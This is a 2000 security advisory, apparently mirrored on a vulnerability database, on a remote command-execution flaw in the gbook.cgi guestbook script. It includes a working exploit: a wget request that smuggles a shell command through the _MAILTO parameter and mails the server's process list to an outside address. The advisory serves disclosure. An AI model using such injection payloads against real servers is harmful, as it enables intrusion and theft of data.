Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:911
HistoryNov 11, 2000 - 12:00 a.m.

[hacksware] gbook.cgi remote command execution vulnerability

2000-11-1100:00:00
vulners.com
166
JSON

Bug Report

  1. Name: gbook.cgi remote command execution vulnerability

  2. Release Date: 2000.11.10

  3. Affected Application:
    GBook - A web site guestbook
    By Bill Kendrick
    [email protected]
    http://zippy.sonoma.edu/kendrick/

  4. Author: [email protected]

  5. Type: Input validation Error

  6. Explanation
    gbook.cgi is used by some web sites.
    We can set _MAILTO parameter, and popen is called to execute mail command.
    If ';' is used in _MAILTO variable, you can execute arbitrary command with it.
    It's so trivial. :)

  7. Exploits
    This exploit executes "ps -ax" command and sends the result to [email protected].

wget
"http://www.victim.com/cgi-bin/gbook/gbook.cgi?_MAILTO=oops;ps%20-ax|mail%[email protected]&_POSTIT=yes&_NEWONTOP=yes&_SHOWEMAIL=yes&_SHOWURL=yes&_SHOWCOMMENT=yes&_SHOWFROM=no&_NAME=hehe&[email protected]&_URL=http://www.yaho.com&_COMMENT=fwe&_FROM=few"

=================================================
| [email protected] |
| http://hacksware.com |

JSON